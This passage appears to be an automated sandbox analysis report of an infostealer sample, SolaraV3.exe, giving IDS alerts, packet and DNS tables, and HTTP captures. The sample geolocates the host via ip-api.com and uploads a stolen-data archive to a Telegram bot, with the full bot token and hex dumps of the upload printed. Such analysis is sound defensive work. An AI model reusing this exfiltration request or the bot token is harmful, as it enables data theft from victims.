TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-04T15:33:02.791270+0200	2857751	ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)	1	192.168.2.7	49733	149.154.167.220	443	TCP
2024-10-04T15:33:04.576286+0200	2857752	ETPRO MALWARE SynthIndi Loader CnC Response	1	149.154.167.220	443	192.168.2.7	49733	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 15:32:21.539729118 CEST	49722	80	192.168.2.7	208.95.112.1
Oct 4, 2024 15:32:21.544846058 CEST	80	49722	208.95.112.1	192.168.2.7
Oct 4, 2024 15:32:21.544919014 CEST	49722	80	192.168.2.7	208.95.112.1
Oct 4, 2024 15:32:21.545020103 CEST	49722	80	192.168.2.7	208.95.112.1
Oct 4, 2024 15:32:21.550314903 CEST	80	49722	208.95.112.1	192.168.2.7
Oct 4, 2024 15:32:22.026937008 CEST	80	49722	208.95.112.1	192.168.2.7
Oct 4, 2024 15:32:22.027946949 CEST	49722	80	192.168.2.7	208.95.112.1
Oct 4, 2024 15:32:22.033832073 CEST	80	49722	208.95.112.1	192.168.2.7
Oct 4, 2024 15:32:22.033902884 CEST	49722	80	192.168.2.7	208.95.112.1
Oct 4, 2024 15:33:01.257522106 CEST	49732	80	192.168.2.7	208.95.112.1
Oct 4, 2024 15:33:01.264720917 CEST	80	49732	208.95.112.1	192.168.2.7
Oct 4, 2024 15:33:01.264801979 CEST	49732	80	192.168.2.7	208.95.112.1
Oct 4, 2024 15:33:01.264930964 CEST	49732	80	192.168.2.7	208.95.112.1
Oct 4, 2024 15:33:01.270106077 CEST	80	49732	208.95.112.1	192.168.2.7
Oct 4, 2024 15:33:01.922219992 CEST	80	49732	208.95.112.1	192.168.2.7
Oct 4, 2024 15:33:01.964771986 CEST	49732	80	192.168.2.7	208.95.112.1
Oct 4, 2024 15:33:02.141784906 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.141812086 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.142371893 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.166951895 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.166970968 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.787797928 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.788218021 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.788233042 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.789385080 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.789452076 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.790224075 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.790299892 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.790671110 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.790679932 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.790833950 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.790870905 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.790970087 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791003942 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.791136026 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791166067 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.791284084 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791299105 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.791322947 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791332006 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.791342974 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791348934 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.791431904 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791444063 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.791686058 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791701078 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.791759014 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791766882 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.791790962 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791807890 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.791815042 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791817904 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.791837931 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791843891 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.791860104 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791929007 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.791946888 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.792005062 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.792026997 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.800950050 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.801090956 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.801103115 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.801117897 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.801129103 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.801225901 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.801235914 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.801342964 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.801353931 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.801359892 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.801364899 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.801384926 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.801460028 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.801517963 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.801570892 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.801625013 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.805793047 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.805994987 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806005955 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.806025028 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806088924 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806107998 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806128025 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806189060 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806536913 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.806647062 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806658030 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.806675911 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806735992 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806751013 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806797028 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806821108 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.806968927 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.807086945 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.807099104 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.807101011 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.807107925 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.807153940 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.807193995 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.807423115 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.807431936 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:02.807442904 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.807460070 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:02.811774969 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:04.575958014 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:04.575978041 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:04.576065063 CEST	443	49733	149.154.167.220	192.168.2.7
Oct 4, 2024 15:33:04.576087952 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:04.576322079 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:04.576968908 CEST	49733	443	192.168.2.7	149.154.167.220
Oct 4, 2024 15:33:04.592525005 CEST	49732	80	192.168.2.7	208.95.112.1
Oct 4, 2024 15:33:04.598949909 CEST	80	49732	208.95.112.1	192.168.2.7
Oct 4, 2024 15:33:04.599019051 CEST	49732	80	192.168.2.7	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 15:32:19.451195002 CEST	53653	53	192.168.2.7	1.1.1.1
Oct 4, 2024 15:32:19.467767954 CEST	53	53653	1.1.1.1	192.168.2.7
Oct 4, 2024 15:32:21.527209044 CEST	60165	53	192.168.2.7	1.1.1.1
Oct 4, 2024 15:32:21.535670042 CEST	53	60165	1.1.1.1	192.168.2.7
Oct 4, 2024 15:33:01.080598116 CEST	59990	53	192.168.2.7	1.1.1.1
Oct 4, 2024 15:33:01.256694078 CEST	53	59990	1.1.1.1	192.168.2.7
Oct 4, 2024 15:33:02.134208918 CEST	57372	53	192.168.2.7	1.1.1.1
Oct 4, 2024 15:33:02.140866041 CEST	53	57372	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 4, 2024 15:32:19.451195002 CEST	192.168.2.7	1.1.1.1	0xbc5f	Standard query (0)	blank-a0m8c.in	A (IP address)	IN (0x0001)	false
Oct 4, 2024 15:32:21.527209044 CEST	192.168.2.7	1.1.1.1	0x37d7	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 15:33:01.080598116 CEST	192.168.2.7	1.1.1.1	0xc2b6	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 15:33:02.134208918 CEST	192.168.2.7	1.1.1.1	0x90ca	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2024 15:32:19.467767954 CEST	1.1.1.1	192.168.2.7	0xbc5f	Name error (3)	blank-a0m8c.in	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 15:32:21.535670042 CEST	1.1.1.1	192.168.2.7	0x37d7	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Oct 4, 2024 15:33:01.256694078 CEST	1.1.1.1	192.168.2.7	0xc2b6	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Oct 4, 2024 15:33:02.140866041 CEST	1.1.1.1	192.168.2.7	0x90ca	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49722	208.95.112.1	80	4892	C:\Users\user\Desktop\SolaraV3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 15:32:21.545020103 CEST	117	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Oct 4, 2024 15:32:22.026937008 CEST	175	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 13:32:21 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49732	208.95.112.1	80	4892	C:\Users\user\Desktop\SolaraV3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 15:33:01.264930964 CEST	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Oct 4, 2024 15:33:01.922219992 CEST	379	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 13:33:01 GMT Content-Type: application/json; charset=utf-8 Content-Length: 202 Access-Control-Allow-Origin: * X-Ttl: 20 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49733	149.154.167.220	443	4892	C:\Users\user\Desktop\SolaraV3.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 13:33:02 UTC	268	OUT	POST /bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 727354 User-Agent: python-urllib3/2.2.3 Content-Type: multipart/form-data; boundary=1c1a3fa26118796b784a6413d888e095
2024-10-04 13:33:02 UTC	16384	OUT	Data Raw: 2d 2d 31 63 31 61 33 66 61 32 36 31 31 38 37 39 36 62 37 38 34 61 36 34 31 33 64 38 38 38 65 30 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 66 72 6f 6e 74 64 65 73 6b 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 56 9b a9 a7 21 04 00 00 01 0f da 3a 7d 29 aa d8 76 49 05 16 32 b4 92 5a 63 6e 2f 9d 31 dc 80 e7 4b a4 40 25 d7 6a eb cc f5 3d f1 92 f5 f2 53 9a ce 92 1f 58 21 d5 6c ad 98 98 7f 23 90 58 36 eb 91 0b 69 55 e1 cb cf cf a3 11 a9 cf f6 e3 2c 3c a7 19 3c 48 d4 c3 c9 04 Data Ascii: --1c1a3fa26118796b784a6413d888e095Content-Disposition: form-data; name="document"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!V!:})vI2Zcn/1K@%j=SX!l#X6iU,<<H
2024-10-04 13:33:02 UTC	16384	OUT	Data Raw: 48 7a 42 31 8d da bb 3d 30 22 bc 63 3a a7 12 f8 36 e4 67 44 b9 cc 7c b6 1e e1 9f 3f 0f 4b 40 a4 60 6a c3 bf 69 9f c7 c5 0a 78 0f bb 4e 06 3d 3c c4 5a 4a 6e 3e 9d 10 34 e3 2b 4b 30 71 66 ac 23 f6 af 96 9c 23 66 e4 42 f6 6b 34 e3 99 22 a3 2c 0c 88 2b 72 c6 37 81 e9 8d f7 23 ba 0c a6 bc 8b 21 1d 29 0a 93 c5 3e f4 71 23 39 6c 72 9e e3 41 d6 56 ba 9e d1 44 e2 8a e0 c3 de 77 1d dc c6 f6 ba 33 3d c4 66 68 fc 8c 13 55 ac ae ae f0 be d3 da f9 e3 c8 4d ea 03 59 fa e0 fb d3 e2 2a 0f f3 a4 30 95 23 41 16 9b 2d f8 e8 e6 ee 9f 70 bd 97 01 32 30 ed 0a 33 50 51 e8 f9 1e 21 f4 f3 d0 74 94 f8 01 8c fa fd d5 3f 5f 24 0a 7f e9 f1 a6 9b 39 0d 9a 72 02 71 c4 54 96 22 84 fc 70 b4 52 99 75 6a 6f 66 66 86 87 52 2b 56 aa 15 5f 6a f2 1f 69 31 8a 0a 5b 0d 08 84 9a 68 12 18 63 73 60 Data Ascii: HzB1=0"c:6gD\|?K@`jixN=<ZJn>4+K0qf##fBk4",+r7#!)>q#9lrAVDw3=fhUMY*0#A-p203PQ!t?_$9rqT"pRujoffR+V_ji1[hcs`
2024-10-04 13:33:02 UTC	16384	OUT	Data Raw: 52 72 93 d1 ac 8e de 30 e1 6c 1f c6 4d 17 54 ad 76 bf 08 dc e7 22 07 77 c2 21 72 22 90 fc 2e e3 e9 30 7c f6 72 b3 ae b5 25 04 ea b5 27 92 3c 01 a7 b8 bf 73 2f b5 09 03 7d 46 a9 90 b3 0a 77 80 44 03 bb a0 c1 80 ce f0 c4 93 1c 1f b1 d1 e7 9f 68 93 fb 0b cc 31 fd 66 c5 65 c9 a1 ee 3b 9d 47 2c 53 b0 b3 09 5a 1b e0 65 a7 8e 8b e4 49 e3 2e 43 e6 4b 47 09 71 2f 94 4f c4 de 5b 7f 56 bd fa d8 01 c4 9d 44 53 4f df 6a 33 f5 cd ed 8e 6d 02 8f d3 2a 28 a9 15 0e 8a de cb 55 42 6e b8 50 85 17 45 eb 93 08 2b 5a 8d 80 d7 af f6 4e 5b f8 99 6b 70 2c d4 45 31 65 68 45 7f 29 61 03 3a 33 6f 8f 32 36 00 96 e7 c9 96 ff e9 5f c0 66 c3 d4 16 16 21 58 37 4f 49 0e 1c d2 63 e6 f4 a4 74 bd 6a 6d 51 9b 18 a9 09 43 e0 b2 e7 36 81 47 2b b8 35 3d f6 07 76 ef 7b 9f b7 47 73 ab ec 77 a1 9b Data Ascii: Rr0lMTv"w!r".0\|r%'<s/}FwDh1fe;G,SZeI.CKGq/O[VDSOj3m*(UBnPE+ZN[kp,E1ehE)a:3o26_f!X7OIctjmQC6G+5=v{Gsw
2024-10-04 13:33:02 UTC	16384	OUT	Data Raw: c7 5a 7e cf 60 34 1a 88 a5 bb 87 2e fd cb c1 64 3d bf 36 b4 b4 1e fd 6e c9 de 36 4d bc 37 d9 32 c7 ef 16 4b c3 22 aa ce 16 62 b9 ae 3d bf 5a 73 93 6d da 29 8d 0e 60 1b 85 c4 2d c8 4f 81 67 01 54 43 fe 87 ab 64 16 1e 61 28 ac 4c d2 61 d9 28 b0 aa e5 ab 71 8e 2a 72 9e d0 fb db 04 a2 67 da 12 ba b8 f4 14 4c 28 8c 5c 78 a5 9c 7f 18 71 4c 17 8e ae ae 5a 38 23 f5 a3 f1 5d 14 29 58 ce 2b fe ee 0a 2f 23 25 96 2a 68 a6 e7 aa 79 9d 80 4c a9 6f a6 8a 24 7b c3 ed bc 42 71 ee c4 92 d9 fa a7 e8 8e 02 43 fe ca f7 da 70 ba 24 50 4f d3 42 4a e8 f5 95 bf 9b e8 1d 34 2c e8 07 1f ec ff d5 99 61 4e 28 e5 6d c0 a8 7f 8a 37 2b 3a 43 81 70 be 9e 89 02 83 af f3 c7 1a 10 a3 ec 92 9f a6 a7 42 5a 84 2c 61 cb 9f 74 1d ee ca c7 63 e3 b1 64 85 f8 4a e6 59 fd 65 45 ea 07 2f 0f 58 6e 00 Data Ascii: Z~`4.d=6n6M72K"b=Zsm)`-OgTCda(La(qrgL(\xqLZ8#])X+/#%hyLo${BqCp$POBJ4,aN(m7+:CpBZ,atcdJYeE/Xn
2024-10-04 13:33:02 UTC	16384	OUT	Data Raw: f9 11 bc 1f d8 e7 d2 f5 14 f7 fa 0e dc 2e 81 23 d1 00 1c c1 9d af e8 aa be 16 94 62 98 d6 37 a0 b9 0c be a1 51 3a b4 6b 04 c6 28 12 01 4f 35 0d be 7b 78 f3 f9 77 6c 46 ea 6f dd 33 0d 8f cb 6d 88 c8 32 60 7c 43 8e 52 48 06 ce 54 ea 7b 75 85 3c f4 d5 51 2c 49 e2 e3 0c c4 92 a2 f5 86 f7 30 ef 16 85 94 dc 4b 4e 9d c2 9d 7a 91 81 cf 26 45 05 90 bc f7 85 86 cd ed f3 ca aa 10 05 e2 9b 63 83 36 2e ec ae 77 15 10 c8 64 ab 67 6e d9 a0 e3 c9 42 cf fb 86 ea 6a a8 ae 76 dd 4d 78 c6 e2 f2 39 c0 c2 90 03 2b 91 a1 1a 89 9f 04 7f 35 64 4e d9 bc 92 a7 fa 2c 7f 20 1d bb 89 a4 94 5a 9c 88 fa f4 b2 9c 70 71 eb 44 f3 00 87 bc 07 3b cb bc d8 df 9b 69 de 83 50 6b 17 5d 29 03 2c 50 58 ec 04 17 04 5f 20 eb e4 fe 40 9e 7b db 4f 47 9a bd dd 1b 3e 4a 49 6c 5f 57 41 b1 a9 2c 2e 84 3a Data Ascii: .#b7Q:k(O5{xwlFo3m2`\|CRHT{u<Q,I0KNz&Ec6.wdgnBjvMx9+5dN, ZpqD;iPk]),PX_ @{OG>JIl_WA,.:
2024-10-04 13:33:02 UTC	16384	OUT	Data Raw: a7 1a ff db 6f 6b 30 ad dd ea ea 5f 26 91 ba 80 74 30 cf 4d 86 dd d1 7c 7a 26 75 36 2f 4c be b9 61 e6 0c ca 48 e0 1b 9f c1 91 ba 5c 40 73 15 59 a1 01 1c f0 c3 a9 fb b5 3b a2 b1 f6 3d d9 bf 54 da 3e 6d 8c 8e 82 ad d7 65 e6 4c c0 14 67 a6 5b dc 59 29 83 5a 50 91 1b 8b e4 e6 27 41 8b 6d ff 0c 8d fd 4b c9 08 ee 80 94 d8 ba 75 d7 dd f1 86 80 c3 c7 f4 15 bd 4f 23 f7 af ec 63 6c 04 bd d8 2a 2f 93 42 f4 10 10 4d a1 0b 79 95 6c 09 fa 32 2f 1a b5 cc be e5 1f ed 3b 44 b6 4a 47 66 4b 79 11 9a 93 dc 6b 89 81 42 0b a1 5f f6 d3 b5 5a b4 e6 0a 6e 57 16 f4 81 40 e9 ab 32 e2 5b 25 f6 63 9f 57 52 17 cb c5 00 c5 47 ed c9 74 c5 a9 bb 20 5a 22 40 00 8c e6 8b dd b9 97 c1 db af d0 54 07 9b be 16 2b 25 77 bc e6 6b fd fd 32 43 71 92 4c cb 11 d6 d7 e7 c7 15 3b 7d 6e 1a 01 1b 4e d9 Data Ascii: ok0_&t0M\|z&u6/LaH\@sY;=T>meLg[Y)ZP'AmKuO#cl*/BMyl2/;DJGfKykB_ZnW@2[%cWRGt Z"@T+%wk2CqL;}nN
2024-10-04 13:33:02 UTC	16384	OUT	Data Raw: 07 b9 86 1b 52 15 83 4d fc 07 92 fc 89 2f 1c 51 4f dc e0 c7 0a 72 6c 29 60 13 2b 82 f0 e4 a4 d5 e6 5f 2b 01 13 27 8d e1 01 6d f4 8a 61 94 5d b9 5e 30 08 2c 4b 85 c0 cd 9f 16 1b 59 3d 1a 14 60 07 97 6c 5a aa c2 6c ba 1b 49 80 25 54 2a 6e de 02 f3 90 f5 6e ce a9 65 25 57 52 f1 9b d2 80 26 05 f7 7f 22 ae a6 a3 76 57 39 a5 be 4c b1 33 e3 8e 9d 21 31 34 18 99 30 00 14 46 16 e9 ad d5 67 b4 c2 37 64 6b fd 40 77 92 83 e4 37 18 f6 99 89 5d 9e 0e ad 65 a0 98 1a f9 b6 d9 68 2f 5f eb d4 28 92 e3 41 a0 44 66 79 f7 c3 28 a9 3b 9b 09 54 01 2f e1 6b f2 97 07 ce 18 84 fb bb ed 82 86 63 14 2c 75 3b 0a 12 b6 3c 8f 08 9c 22 ab 5d 6a 17 10 d6 c4 bb 69 90 26 57 3e d8 c7 cd 60 1b 5d 61 30 10 fd e5 eb e2 fa 07 67 aa 29 b8 88 8d 9b 0e f1 19 fe d2 7a 07 86 b5 75 7d 54 13 ed 97 0f Data Ascii: RM/QOrl)`+_+'ma]^0,KY=`lZlI%T*nne%WR&"vW9L3!140Fg7dk@w7]eh/_(ADfy(;T/kc,u;<"]ji&W>`]a0g)zu}T
2024-10-04 13:33:02 UTC	16384	OUT	Data Raw: a4 00 d4 4a 43 a2 c7 56 90 b2 9a 41 ba c1 71 66 a7 82 57 09 ab 25 e0 f9 c2 d7 23 07 94 27 08 58 7f 66 d1 50 85 ec 97 ef 72 1f a6 04 60 69 9e e1 b0 ae 76 93 cc e9 0d 44 28 b8 bb 0d 7c c6 7f 89 52 9f 0e 67 fa 1b 6e f0 34 11 e7 d5 cf 8e 4a ef 17 6b 50 e2 53 8f e0 63 6d 72 0d 48 e5 a3 5b ea cf bf 4a e9 64 9b 3a ae 3a 3d a4 9f 07 a6 4b ae 1c 04 46 75 16 cf 63 80 af 2b a0 0f 8d c5 bc 0b 33 1d a8 8a 30 0b 1b 2d 52 11 b2 39 88 9a e0 dc e6 81 5c 02 70 45 47 37 da 62 64 88 e0 59 9e 3a 7f c3 05 11 23 48 1e c7 10 e4 41 4d e0 9e 1c e2 8e d4 e3 69 60 f2 60 ef 9c 0b bf 86 eb d2 ca 46 a9 04 96 11 d4 5b 59 21 e5 22 44 99 6f 2b 0a a5 8f 33 64 dc f6 52 69 2a dd a7 73 86 ad f2 d4 31 60 c2 f2 b0 17 43 50 56 fe 61 4e 32 ce 4d 0a 3d 71 59 63 a4 11 f2 61 8a 08 68 b5 9f 4d 90 61 Data Ascii: JCVAqfW%#'XfPr`ivD(\|Rgn4JkPScmrH[Jd::=KFuc+30-R9\pEG7bdY:#HAMi``F[Y!"Do+3dRi*s1`CPVaN2M=qYcahMa
2024-10-04 13:33:02 UTC	16384	OUT	Data Raw: 35 d4 14 53 26 fc 48 63 22 93 b8 6f f3 4b 21 92 2d e7 77 99 74 5e a1 24 21 8d d1 eb ae 54 2a b7 32 1e f4 2a f7 cc f5 e7 9f 36 cf e2 b5 fa 45 51 84 e0 06 4b a7 df 26 51 82 57 4b 84 ee fd da 5e 09 49 a3 96 d1 f6 65 00 df 1d 60 4d 8e 99 4c fc 90 6e 97 af 52 e0 78 7b 3a 3c e4 9d 44 7e 96 11 79 fb b7 b2 a0 0d ba f7 32 54 d2 83 70 d7 23 c8 65 11 f3 c3 ea 29 98 d3 4f ff 67 c4 1c 3d dc b1 50 c8 41 47 50 13 ad 86 b5 42 a5 c2 7b d6 bd 58 be 09 1e 26 40 ef e7 49 fd 82 57 8d df 95 bc 9c 43 a8 40 b5 5c 30 5a 89 25 4d 6b 93 53 6e c1 eb d7 8c 17 54 e1 e6 6d 48 d2 46 41 69 c0 be 19 5b 6b c4 cc 71 48 4d fd e9 eb de 35 23 38 7d 28 6b c0 99 d3 47 48 4b 9e 6d b6 50 a8 43 4e 14 56 11 17 